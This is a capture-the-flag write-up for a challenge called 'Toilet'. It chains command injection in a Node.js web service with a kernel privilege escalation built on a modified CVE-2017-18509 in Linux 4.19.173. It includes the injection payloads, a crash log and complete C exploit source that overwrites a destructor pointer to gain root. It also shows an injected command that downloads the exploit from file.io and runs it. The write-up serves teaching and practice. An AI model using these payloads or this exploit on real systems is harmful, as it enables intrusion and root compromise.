Toilet

Toilet Challenge

Description

The challenge has two links: Local and Remote.

Opening the remote link shows a simple web page.

Toilet web page

Clicking the flush button leads to a page with the input text rendered as ASCII art.

Toilet ASCII

The local link sends us to a GitHub page whose README.md describes the challenge.

Understanding

"This is a kernel challenge (with a little web one at first :) ) !"

The GitHub repo contains a Dockerfile that builds an image with a qemu system running a small website and a specific Linux kernel (we will talk about it later). It creates a user bsides:bsides and a flag file at /root/flag/flag.txt (chmod 400, owned by root), and starts qemu when the container starts.

Readme tells us:

About the bug:

  1. Achieve RCE in our webservice.
  2. 4.19.173 kernel, please achieve root privs with this bug

hint: /proc/kallsyms and /dev/kmsg is readable

Achieve RCE in our webservice

This is the easy part of the challenge.

The webservice runs a nodejs file.

The interesting part of the code is:

var command = "toilet " + req.body.toilet_text + filter + " --html"
exec(command.toString('utf8'), function (err, stdout, stderr) {
  if (err) {
    res.send("nope...");
  } else {
    res.send(stdout);
  }
});

This is a classic command injection (CWE-78).

The exec function runs the command through a shell and then invokes the callback: on error, nope... is sent to the user; otherwise the command's stdout is sent.

The command is built by concatenating the toilet application name with parameters taken from the web form, which the user controls.

For example, entering BSidesTLV2021 --html ; cat /etc/passwd ; echo into the website prints the contents of /etc/passwd:

/etc/passwd

  1. DONE!
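To make the injection concrete, here is a minimal C sketch that reproduces the same string concatenation and counts how many shell commands the result contains. The helper names build_command and count_shell_commands are hypothetical, the value of filter is assumed to be empty, and the ';' counting is deliberately naive (it ignores quoting).

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Mimics the vulnerable concatenation: "toilet " + text + filter + " --html".
 * Returns the number of characters written, or -1 if the buffer is too small. */
int build_command(char *out, size_t out_size,
                  const char *toilet_text, const char *filter)
{
    assert(out != NULL && toilet_text != NULL && filter != NULL);
    int n = snprintf(out, out_size, "toilet %s%s --html", toilet_text, filter);
    return (n < 0 || (size_t)n >= out_size) ? -1 : n;
}

/* Naive count: a shell starts a new command after every unquoted ';'.
 * Quoting is ignored here, which is enough for this illustration. */
int count_shell_commands(const char *command)
{
    assert(command != NULL);
    int count = 1;
    for (const char *p = command; *p != '\0'; p++)
        if (*p == ';')
            count++;
    return count;
}
```

With the example input, the shell receives three commands instead of one: the toilet call, cat /etc/passwd, and a trailing echo that swallows the appended --html.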

Achieve root privs

The original bug:

CVE-2017-18509: An issue was discovered in net/ipv6/ip6mr.c in the Linux kernel before 4.11. By setting a specific socket option, an attacker can control a pointer in kernel land and cause an inet_csk_listen_stop general protection fault, or potentially execute arbitrary code under certain circumstances. The issue can be triggered as root (e.g., inside a default LXC container or with the CAP_NET_ADMIN capability) or after namespace unsharing. This occurs because sk_type and protocol are not checked in the appropriate part of the ip6_mroute_* functions.

Missing mitigations

The kernel runs with the nokaslr flag, and the qemu CPU has SMAP and SMEP disabled. This is the default qemu configuration; to enable them you would need to add -cpu kvm64,smep,smap.
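One way to confirm this from inside the guest is to look for smep and smap on the flags line of /proc/cpuinfo. The sketch below only shows the token matching on such a line; has_cpu_flag is a hypothetical helper, and reading the file is left out.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Returns true if `flag` appears as a whole whitespace-separated token
 * in `flags` (for example the "flags" line of /proc/cpuinfo). */
bool has_cpu_flag(const char *flags, const char *flag)
{
    assert(flags != NULL && flag != NULL);
    size_t len = strlen(flag);
    if (len == 0)
        return false;

    const char *p = flags;
    while ((p = strstr(p, flag)) != NULL) {
        bool starts_token = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        bool ends_token = p[len] == '\0' || p[len] == ' ' ||
                          p[len] == '\t' || p[len] == '\n';
        if (starts_token && ends_token)
            return true;
        p += len; /* keep searching after this partial match */
    }
    return false;
}
```

If neither flag is present, the kernel can both execute and read user-space memory, which is what the rest of this write-up relies on.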

Deep into the code

The bug in the challenge kernel is even worse than the original.

Looking at the code:

int ip6_mroute_setsockopt(struct sock *sk, int optname, char __user *optval, unsigned int optlen)
{
    int ret, parent = 0;
    struct mif6ctl vif;
    struct mf6cctl mfc;
    mifi_t mifi;
    struct net *net = sock_net(sk);
    struct mr_table *mrt;

    /*if (sk->sk_type != SOCK_RAW ||
        inet_sk(sk)->inet_num != IPPROTO_ICMPV6)
        return -EOPNOTSUPP;*/

  printk("raw6_sk(sk)->ip6mr_table = %p, %x\n", &raw6_sk(sk)->ip6mr_table, raw6_sk(sk)->ip6mr_table);
    mrt = ip6mr_get_table(net, raw6_sk(sk)->ip6mr_table ? : RT6_TABLE_DFLT);
    if (!mrt)
        return -ENOENT;

    /*if (optname != MRT6_INIT) {
        if (sk != rcu_access_pointer(mrt->mroute_sk) &&
            !ns_capable(net->user_ns, CAP_NET_ADMIN))
            return -EACCES;
    }*/

The kernel function ip6_mroute_setsockopt is called when setsockopt is invoked on an IPv6 socket with an optname between MRT6_BASE and MRT6_MAX (see ipv6_sockglue.c).

The original bug is that nothing verifies that the socket is an ICMPv6 RAW socket.

The challenge code makes it worse: the CAP_NET_ADMIN check is also removed, so an unprivileged user can reach this path.
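The routing decision can be sketched as a simple range check. MRT6_BASE and MRT6_TABLE match the values used in the appendix; the value of MRT6_MAX is an assumption for this kernel series, and is_mroute_opt is a hypothetical name for the check.

```c
#include <assert.h>
#include <stdbool.h>

#define MRT6_BASE  200
#define MRT6_TABLE (MRT6_BASE + 9)
#define MRT6_MAX   (MRT6_BASE + 11) /* assumption: may differ between kernel versions */

/* True if this optname would be routed to the multicast-routing handler. */
bool is_mroute_opt(int optname)
{
    return optname >= MRT6_BASE && optname <= MRT6_MAX;
}
```

Because the check looks only at optname, any IPv6 socket type (including a TCP listener) reaches ip6_mroute_setsockopt once the socket-type and capability checks are commented out.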

The advisory by Denis Andzakovic, LINUX KERNEL 4.9 - INET_CSK_LISTEN_STOP GPF (CVE-2017-18509), explains a potential path to code execution.

The code calls setsockopt with MRT6_TABLE optname

  switch (optname) {
  case MRT6_TABLE:
    {
        u32 v;

        if (optlen != sizeof(u32))
            return -EINVAL;
        if (get_user(v, (u32 __user *)optval))
            return -EFAULT;
        /* "pim6reg%u" should not exceed 16 bytes (IFNAMSIZ) */
        /*if (v != RT_TABLE_DEFAULT && v >= 100000000)
            return -EINVAL;*/
        if (sk == rcu_access_pointer(mrt->mroute_sk))
            return -EBUSY;

        rtnl_lock();
        ret = 0;
        mrt = ip6mr_new_table(net, v);
        if (IS_ERR(mrt))
            ret = PTR_ERR(mrt);
        else {
      printk("raw6_sk(sk)->ip6mr_table = v; \n"); 
            raw6_sk(sk)->ip6mr_table = v; 
    }
        rtnl_unlock();
        return ret;
    }

This code treats the socket as a raw socket via raw6_sk(sk) and writes the user-supplied integer into it with raw6_sk(sk)->ip6mr_table = v. In this challenge the value is no longer sanitized, because the v >= 100000000 check is commented out.
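The effect of this type confusion can be illustrated in user space with two toy structures that share the same memory. The layouts below are hypothetical and much simpler than the real kernel structures; they only show that a write through the "raw" view lands in whatever field the "TCP" view keeps at the same offset.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified layouts: NOT the real kernel structures. */
struct toy_raw_sock {
    char     common[16];
    uint32_t ip6mr_table;        /* what the raw-socket code thinks is here */
};

struct toy_tcp_sock {
    char     common[16];
    uint32_t accept_queue_head;  /* what a TCP listener really keeps here */
};

union toy_sock {
    struct toy_raw_sock raw;
    struct toy_tcp_sock tcp;
};

/* Mimics "raw6_sk(sk)->ip6mr_table = v" with no check of the socket type. */
void toy_set_table(union toy_sock *sk, uint32_t v)
{
    assert(sk != NULL);
    sk->raw.ip6mr_table = v;
}
```

Judging from the crash in inet_csk_listen_stop, the field that gets overwritten on a real TCP listener appears to be the head of its accept queue, which is why the chosen table value later shows up as a request pointer.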

Back to the POC

int main(){
        uint32_t opt = 99999999;
        int sock = socket(AF_INET6, SOCK_STREAM, 0);
        listen(sock, 0);
        setsockopt(sock, IPPROTO_IPV6, MRT6_TABLE, &opt, 4);
        close(sock); // boom
        return 0;
}

This code leads to this GPF, very similar to what Denis saw:

[  106.780011] raw6_sk(sk)->ip6mr_table = 00000000a6c3b904, 0
[  106.783755] mrt->id = 254, id = 254
[  106.784126] mrt->id = 254, id = 99999999
[  106.784384] mr_table_alloc!
[  106.785051] raw6_sk(sk)->ip6mr_table = v; 
[  106.787147] BUG: unable to handle kernel paging request at 0000000005f5e187
[  106.787147] PGD 0 P4D 0 
[  106.787147] Oops: 0000 [#1] SMP NOPTI
[  106.787147] CPU: 1 PID: 1899 Comm: toilet_crash Not tainted 4.19.173 #1
[  106.787147] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[  106.792713] RIP: 0010:inet_csk_listen_stop+0x132/0x260
[  106.792713] Code: 48 89 ef e8 00 a2 21 00 4c 8b a3 b8 03 00 00 48 89 ef 48 c7 83 b8 03 00 00 00 00 00 00 e8 86 a0 21 00 4d 85 e4 74 7b 4c 89 e5 <4d> 8b a4 24 88 00 00 00 f0 ff 8d 80 00 00 00 0f 88 04 30 21 00 75
[  106.792713] RSP: 0018:ffffc9000058fe08 EFLAGS: 00000206
[  106.792713] RAX: 0000000080000000 RBX: ffff88801b750000 RCX: 0000000000002d55
[  106.792713] RDX: 0000000000000001 RSI: 00000000fffffe01 RDI: ffffffff818302ba
[  106.792713] RBP: 0000000005f5e0ff R08: 0000000000023ea0 R09: ffffffff8182d729
[  106.792713] R10: ffffea000070cf00 R11: 0000000000000000 R12: 0000000005f5e0ff
[  106.792713] R13: ffff88801b750390 R14: ffff888013c3ff00 R15: ffff88801df94a30
[  106.792713] FS:  00007ff35eaaf500(0000) GS:ffff88801f280000(0000) knlGS:0000000000000000
[  106.792713] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  106.792713] CR2: 0000000005f5e187 CR3: 000000001db92000 CR4: 00000000000006e0
[  106.792713] Call Trace:
[  106.792713]  tcp_close+0x3d6/0x430
[  106.792713]  inet_release+0x2f/0x60
[  106.792713]  __sock_release+0x38/0xa0
[  106.792713]  sock_close+0xc/0x10
[  106.792713]  __fput+0xac/0x1e0
[  106.792713]  task_work_run+0x7c/0xa0
[  106.792713]  exit_to_usermode_loop+0x93/0xa0
[  106.792713]  do_syscall_64+0xc6/0xf0
[  106.792713]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  106.792713] RIP: 0033:0x7ff35e9d7b54
[  106.792713] Code: eb 8d e8 7f fc 01 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 8d 05 a9 5b 0d 00 8b 00 85 c0 75 13 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 3c c3 0f 1f 00 53 89 fb 48 83 ec 10 e8 e4 bb
[  106.792713] RSP: 002b:00007fffe7789ec8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[  106.792713] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007ff35e9d7b54
[  106.792713] RDX: 00000000000000d1 RSI: 0000000000000029 RDI: 0000000000000004
[  106.792713] RBP: 00007fffe7789ee0 R08: 0000000000000004 R09: 00007ff35eaa9d80
[  106.792713] R10: fffffffffffff47e R11: 0000000000000246 R12: 00005572bdeb7080
[  106.792713] R13: 00007fffe7789fc0 R14: 0000000000000000 R15: 0000000000000000
[  106.792713] Modules linked in:
[  106.792713] CR2: 0000000005f5e187
[  106.820165] ---[ end trace c9a568b366f41ce7 ]---
[  106.821074] RIP: 0010:inet_csk_listen_stop+0x132/0x260
[  106.821074] Code: 48 89 ef e8 00 a2 21 00 4c 8b a3 b8 03 00 00 48 89 ef 48 c7 83 b8 03 00 00 00 00 00 00 e8 86 a0 21 00 4d 85 e4 74 7b 4c 89 e5 <4d> 8b a4 24 88 00 00 00 f0 ff 8d 80 00 00 00 0f 88 04 30 21 00 75
[  106.824442] RSP: 0018:ffffc9000058fe08 EFLAGS: 00000206
[  106.824954] RAX: 0000000080000000 RBX: ffff88801b750000 RCX: 0000000000002d55
[  106.826636] RDX: 0000000000000001 RSI: 00000000fffffe01 RDI: ffffffff818302ba
[  106.827265] RBP: 0000000005f5e0ff R08: 0000000000023ea0 R09: ffffffff8182d729
[  106.827905] R10: ffffea000070cf00 R11: 0000000000000000 R12: 0000000005f5e0ff
[  106.828328] R13: ffff88801b750390 R14: ffff888013c3ff00 R15: ffff88801df94a30
[  106.829909] FS:  00007ff35eaaf500(0000) GS:ffff88801f280000(0000) knlGS:0000000000000000
[  106.830884] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  106.866233] CR2: 0000000005f5e187 CR3: 000000001db92000 CR4: 00000000000006e0
Killed

The crash happens in inet_csk_listen_stop when dereferencing req->dl_next and the address of the crash is 0x5f5e187 (which is 0x5F5E0FF [or 99999999] + 0x88 dl_next offset).

while (req != NULL) {
  next = req->dl_next;
  reqsk_put(req);
  req = next;
}
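The faulting address can be checked with a one-line computation. This is only a worked example of the arithmetic above; fault_address is a hypothetical helper and the 0x88 offset is the one stated in the text.

```c
#include <assert.h>
#include <stdint.h>

#define DL_NEXT_OFFSET 0x88u /* offset of dl_next, as stated in the text */

/* Address the kernel reads when it evaluates req->dl_next
 * for a req pointer equal to the chosen table value. */
uint64_t fault_address(uint32_t table_value)
{
    return (uint64_t)table_value + DL_NEXT_OFFSET;
}
```

For the PoC value 99999999 (0x5f5e0ff) this gives 0x5f5e187, which matches CR2 in the oops.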

Let's have a look at the reqsk_put function:

static inline void reqsk_put(struct request_sock *req) {
    if (refcount_dec_and_test(&req->rsk_refcnt))
        reqsk_free(req);
}

The function decrements the ref count (at offset 0x80) and, if it reaches 0 after the decrement, calls reqsk_free to release the request.

static inline void reqsk_free(struct request_sock *req)
{
    /* temporary debugging */
    WARN_ON_ONCE(refcount_read(&req->rsk_refcnt) != 0);

    req->rsk_ops->destructor(req);
    if (req->rsk_listener)
        sock_put(req->rsk_listener);
    kfree(req->saved_syn);
    kmem_cache_free(req->rsk_ops->slab, req);
}

reqsk_free dereferences req->rsk_ops (at offset 0xC0) and calls its destructor function (at offset 0x30).

Since we control the req address, we control the destructor address.

Exploit

We start by mapping memory at a fixed address that fits in 32 bits, because the MRT6_TABLE value is a u32.

unsigned char* map = (unsigned char*)mmap((void*)0x10000, 0x10000, (PROT_EXEC | PROT_READ | PROT_WRITE), (MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS), -1, 0);

We then use the address of the mapped memory as the table value for setsockopt.

table = (int)map;
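The 32-bit constraint can be stated as a round-trip check: the address must be unchanged after being squeezed through a 32-bit value. fits_in_u32 is a hypothetical helper used only for illustration.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* True if the address is unchanged after truncation to 32 bits,
 * i.e. it can be passed through the u32 table value without loss. */
bool fits_in_u32(uint64_t addr)
{
    return (uint64_t)(uint32_t)addr == addr;
}
```

The fixed mapping at 0x10000 passes this check, whereas a typical 64-bit stack or heap address would be truncated, which is why the exploit uses MAP_FIXED at a low address.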

ref_count is at offset 0x80

int* ref_count = (int*)&map[128];
*ref_count = 1;

rsk_ops is at offset 0xC0, and we point it at an address inside our mapping

uint64_t *rsk_ops = (uint64_t*)&map[0xc0];
*rsk_ops = 0x100c0;

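The destructor pointer is at offset 0x30 inside rsk_ops, and we set it to our priv_shell function (defined below)

uint64_t* destruct = (uint64_t*)((*rsk_ops) + 0x30);
*destruct = (uint64_t)&priv_shell;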
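The layout can be sanity-checked in user space before touching the kernel. The sketch below builds the same fake object in an ordinary buffer and replays the reqsk_put and reqsk_free pointer walk using the offsets from the text. All function names are hypothetical, and the counting destructor stands in for priv_shell.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define REFCNT_OFFSET     0x80 /* rsk_refcnt, per the text */
#define RSK_OPS_OFFSET    0xc0 /* rsk_ops pointer, per the text */
#define DESTRUCTOR_OFFSET 0x30 /* destructor slot inside rsk_ops, per the text */

typedef void (*destructor_fn)(void *req);

int destructor_calls; /* counts invocations of the stand-in destructor */

void counting_destructor(void *req) { (void)req; destructor_calls++; }

/* Lays out a fake request object; rsk_ops points back into the same buffer,
 * mirroring "*rsk_ops = 0x100c0" in the exploit. */
void build_fake_req(unsigned char *buf, size_t size, destructor_fn fn)
{
    assert(buf != NULL);
    assert(size >= RSK_OPS_OFFSET + DESTRUCTOR_OFFSET + sizeof fn);
    memset(buf, 0, size);
    int32_t refcnt = 1;
    memcpy(buf + REFCNT_OFFSET, &refcnt, sizeof refcnt);
    unsigned char *ops = buf + RSK_OPS_OFFSET;
    memcpy(buf + RSK_OPS_OFFSET, &ops, sizeof ops);
    memcpy(ops + DESTRUCTOR_OFFSET, &fn, sizeof fn);
}

/* Replays the pointer walk: decrement the refcount and, if it hits zero,
 * call the destructor found through rsk_ops. Returns 1 if it was called. */
int simulate_reqsk_put(unsigned char *req)
{
    int32_t refcnt;
    memcpy(&refcnt, req + REFCNT_OFFSET, sizeof refcnt);
    refcnt--;
    memcpy(req + REFCNT_OFFSET, &refcnt, sizeof refcnt);
    if (refcnt != 0)
        return 0;

    unsigned char *ops;
    destructor_fn fn;
    memcpy(&ops, req + RSK_OPS_OFFSET, sizeof ops);
    memcpy(&fn, ops + DESTRUCTOR_OFFSET, sizeof fn);
    fn(req);
    return 1;
}
```

Setting the ref count to exactly 1 matters: the destructor is only reached when the decrement brings the count to zero.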

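We now have code execution. As mentioned, KASLR, SMEP and SMAP are disabled, so kernel symbol addresses are fixed and the kernel can execute and read our user-space mapping directly.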

We want to make a privilege escalation to our process, and then read the flag.

The simplest way of doing this is to call two functions: int commit_creds(struct cred *new) and struct cred *prepare_kernel_cred(struct task_struct *daemon).

commit_creds (see ALTERING CREDENTIALS), as its name says, receives a credential structure and commits it to the currently running process. prepare_kernel_cred prepares a set of credentials for a kernel service; if daemon is NULL, the credentials are set to 0 (root).

cat /proc/kallsyms | grep commit_creds
ffffffff8107c070 T commit_creds
cat /proc/kallsyms | grep prepare_kernel_cred
ffffffff8107c420 T prepare_kernel_cred

#define KERNCALL __attribute__((regparm(3)))
void (*commit_creds)(void*) KERNCALL = (void*) 0xffffffff8107c070;
void *(*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xffffffff8107c420;

static void priv_shell(void){
    commit_creds(prepare_kernel_cred(0));
    restore_state();
}
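Since /proc/kallsyms is readable, the two addresses could also be looked up at run time instead of being hard-coded. The following is a minimal sketch of parsing a single line in the format shown above; parse_kallsyms_line is a hypothetical helper, and the loop over the file is omitted.

```c
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parses one kallsyms-style line: "<hex address> <type> <name>".
 * Returns 1 and stores the address if the name matches `symbol`, else 0. */
int parse_kallsyms_line(const char *line, const char *symbol, uint64_t *addr)
{
    assert(line != NULL && symbol != NULL && addr != NULL);
    unsigned long long value;
    char type;
    char name[128];

    if (sscanf(line, "%llx %c %127s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, symbol) != 0)
        return 0;

    *addr = (uint64_t)value;
    return 1;
}
```

Comparing the whole name avoids the partial matches that a plain grep would also return. With nokaslr the addresses stay the same across boots of the same kernel build, so hard-coding them works here.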

One piece is still missing. Our code runs in kernel mode: the kernel reaches the destructor pointer and calls priv_shell, and afterwards execution would return to the original kernel code in reqsk_free.

Instead, we want to "cut" the stack and return directly to user mode (we used the same code from here).

struct TrapFrame{
    unsigned long rip;
    unsigned long cs;
    unsigned long rflags;
    unsigned long rsp;
    unsigned long ss;

}__attribute((packed));

struct TrapFrame tf;

static void save_state(void) {
    asm volatile(
            "movq %%cs, %0\n"
            "movq %%ss, %1\n"
            "pushfq\n"
            "popq %2\n"
            : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags)
            :
            :"memory");
}

static void restore_state(void){
    asm volatile(
            "swapgs;"
            "movq %0, 0x20(%%rsp)\n"
            "movq %1, 0x18(%%rsp)\n"
            "movq %2, 0x10(%%rsp)\n"
            "movq %3, 0x8(%%rsp)\n"
            "movq %4, 0x0(%%rsp)\n"
            "iretq"
            :
            :"r"(tf.ss), "r"((unsigned long)0x11000), "r"(tf.rflags), "r"(tf.cs), "r"(shell)
            :"memory"            
            );            
}

The save_state function saves the CS (code segment) and SS (stack segment) registers and rflags (status register). The restore_state function switches GS back to its user-mode value (swapgs), rebuilds the stack frame, and returns (iretq, interrupt return) to our shell function.

static void shell(void) {
    char* argv[] = {"/bin/cat","/root/flag/flag.txt" ,NULL};
    execve(argv[0], argv, NULL);
}

We now have everything needed to read the flag. What remains is to run this code on the remote machine through the webserver RCE.

  1. Create a toilet.c file with all the code
  2. Compile it inside the local qemu machine (gcc toilet.c -o toilet)
  3. Upload the compiled file to file.io (a simple file share service with one-time URLs): curl -F "file=@toilet" https://file.io returns {"success":true,"status":200,"id":"51fd4580-eac2-11eb-b008-718efd7a117a","key":"txUPbPH82Ou5","name":"toilet","link":"https://file.io/txUPbPH82Ou5", "private":false,"expires":"2021-08-05T07}
  4. Inject the following input into the web form: flag --html ; curl https://file.io/txUPbPH82Ou5 -o /tmp/toilet_jctf ; chmod 777 /tmp/toilet_jctf ; /tmp/toilet_jctf ; rm /tmp/toilet_jctf ; echo
  5. The response contains the flag

Appendix

toilet.c

#include <netinet/icmp6.h>
#ifdef __linux__
#include <linux/mroute6.h>
#else
#include <netinet6/ip6_mroute.h>
#endif

#include <sys/socket.h>
#include <netinet/in.h>
#include <net/if.h>
#include <errno.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <stdint.h>
#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
#include <string.h>  /* memset */
#include <sys/mman.h>

#define MRT6_BASE    200
#define MRT6_TABLE    (MRT6_BASE+9)    /* Specify mroute table ID        */

struct TrapFrame {
    unsigned long rip;
    unsigned long cs;
    unsigned long rflags;
    unsigned long rsp;
    unsigned long ss;

}__attribute((packed));

struct TrapFrame tf;

#define KERNCALL __attribute__((regparm(3)))
void (*commit_creds)(void*) KERNCALL = (void*) 0xffffffff8107c070;
void *(*prepare_kernel_cred)(void*) KERNCALL = (void*) 0xffffffff8107c420;

static void shell(void) {
    char* argv[] = {"/bin/cat","/root/flag/flag.txt", NULL};
    execve(argv[0], argv, NULL);
}

static void save_state(void) {
    asm volatile(
            "movq %%cs, %0\n"
            "movq %%ss, %1\n"
            "pushfq\n"
            "popq %2\n"
            : "=r"(tf.cs), "=r"(tf.ss), "=r"(tf.rflags)
            :
            :"memory");
}

static void restore_state(void) {
    asm volatile(
            "swapgs;"
            "movq %0, 0x20(%%rsp)\n"
            "movq %1, 0x18(%%rsp)\n"
            "movq %2, 0x10(%%rsp)\n"
            "movq %3, 0x8(%%rsp)\n"
            "movq %4, 0x0(%%rsp)\n"
            "iretq"
            :
            :"r"(tf.ss), "r"((unsigned long)0x11000), "r"(tf.rflags), "r"(tf.cs), "r"(shell)
            :"memory"            
            );
}

static void priv_shell(void) {
    commit_creds(prepare_kernel_cred(0));
    restore_state();
}

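int main(void) {
    int table = 0;

    save_state();

    unsigned char* map = mmap(
      (void*)0x10000, // address 
      0x10000, // size
      (PROT_EXEC | PROT_READ | PROT_WRITE), // prot
      (MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED), //flags
       -1, 0); // no backing file
    
    if (map == MAP_FAILED) exit(-1); // mmap reports failure with MAP_FAILED, not NULL

    memset(map,0,0x1000);
    printf("map = %p\n", map);
    table = (int)(uintptr_t)map; // the address must fit the 32-bit table value

    // fake request_sock: ref count of 1 so reqsk_put reaches reqsk_free
    int* ref_count = (int*)&map[128];
    *ref_count = 1;

    // rsk_ops points back into our mapping
    uint64_t *rsk_ops = (uint64_t*)&map[0xc0];
    *rsk_ops = 0x100c0;

    // destructor slot inside the fake rsk_ops
    uint64_t* destruct = (uint64_t*)((*rsk_ops) + 0x30);
    *destruct = (uint64_t)&priv_shell;

    int sock;
    sock = socket(AF_INET6, SOCK_STREAM, 0);
    listen(sock,0);
    setsockopt (sock, IPPROTO_IPV6, MRT6_TABLE, &table, sizeof (table));
    close(sock); // triggers inet_csk_listen_stop and the destructor call
    return 0;
}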